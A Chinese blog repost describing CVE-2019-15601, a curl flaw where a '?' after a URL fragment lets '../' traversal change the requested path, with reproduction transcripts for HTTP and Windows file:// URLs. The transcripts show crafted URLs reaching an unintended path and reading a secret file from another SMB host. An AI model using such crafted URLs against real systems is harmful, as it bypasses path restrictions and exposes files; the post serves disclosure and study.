不要总想搞小新闻，这个漏洞千万不要看！

发布于2023年11月25日2025年7月19日作者:cve-20

不要总想搞小新闻，这个漏洞千万不要看！

原创回收CVE垃圾一个不正经的黑客 2023-11-24 19:35

免责声明：本文所涉及的技术和方法仅供合法合规的目的参考和学习使用。严禁利用本文内容从事任何违法或未经授权的活动。如因个人非法使用所造成的任何不良后果，作者及本公众号概不负责

一个鲜为人知的处于Reserved状态的CVE漏洞:

CVE-2019-15601

漏洞概述

CURL 7.62 版本之后，尽管解析了在 “#”（片段分隔符）之后具有 “?”（参数分隔符）字符的 URL，但 CURL 的 urlapi 代码在处理路径时将哈希部分视为相同的路径，可能对某些特定协议产生安全影响。

问题描述

在 HTTP 上，攻击者可能通过在 URL 的片段部分附加 “?” 来修改原始请求，具体示例请参见下文。而在 FILE 协议上，CURL 可能在 Windows 上请求 FILE URL 时混淆，因为 Windows 上的 FILE 协议支持 SMB。

重现步骤

HTTP Example:

fmunozs@ashes MINGW64 ~/Downloads/curl-7.66.0_2-win64-mingw/curl-7.66.0-win64-mingw/bin
$ ./curl -v "http://localhost/safepath/something#/../../anotherpath/somethingelse"
  % Total % Received % Xferd Average Speed Time Time Time Current
                                 Dload Upload Total Spent Left Speed
  0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0

* Trying ::1:80...
* TCP_NODELAY set
* Connected to localhost (::1) port 80 (#0)
> GET /safepath/something HTTP/1.1
> Host: localhost
> User-Agent: curl/7.66.0
> Accept: */*
>

fmunozs@ashes MINGW64 ~/Downloads/curl-7.66.0_2-win64-mingw/curl-7.66.0-win64-mingw/bin
$ ./curl -v "http://localhost/safepath/something#/../../anotherpath/somethingelse?"
  % Total % Received % Xferd Average Speed Time Time Time Current
                                 Dload Upload Total Spent Left Speed
  0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0

* Trying ::1:80...
* TCP_NODELAY set
* Connected to localhost (::1) port 80 (#0)
> GET /anotherpath/somethingelse? HTTP/1.1
> Host: localhost
> User-Agent: curl/7.66.0
> Accept: */*
>

File Example:

fmunozs@ashes MINGW64 ~/Downloads/curl-7.66.0_2-win64-mingw/curl-7.66.0-win64-mingw/bin
$ ./curl "file://localhost/windows/win.ini"
  % Total % Received % Xferd Average Speed Time Time Time Current
                                 Dload Upload Total Spent Left Speed
100    92  100    92    0     0  46000      0 --:--:-- --:--:-- --:--:-- 46000
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1


fmunozs@ashes MINGW64 ~/Downloads/curl-7.66.0_2-win64-mingw/curl-7.66.0-win64-mingw/bin
$ ./curl "file://localhost/windows/win.ini#/../..//192.168.88.248/home/secret.txt"
  % Total % Received % Xferd Average Speed Time Time Time Current
                                 Dload Upload Total Spent Left Speed
100    92  100    92    0     0  46000      0 --:--:-- --:--:-- --:--:-- 46000
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

fmunozs@ashes MINGW64 ~/Downloads/curl-7.66.0_2-win64-mingw/curl-7.66.0-win64-mingw/bin
$ ./curl "file://localhost/windows/win.ini#/../..//192.168.88.248/home/secret.txt?"
  % Total % Received % Xferd Average Speed Time Time Time Current
                                 Dload Upload Total Spent Left Speed
100    33  100    33    0     0   2750      0 --:--:-- --:--:-- --:--:--  2750
file on different smb server/path

漏洞影响

HTTP Example:

修改了多个协议上的预期请求行为，同时因为没多少人知道，所以初步判断该漏洞无影响，经鉴定为
非核弹级
漏洞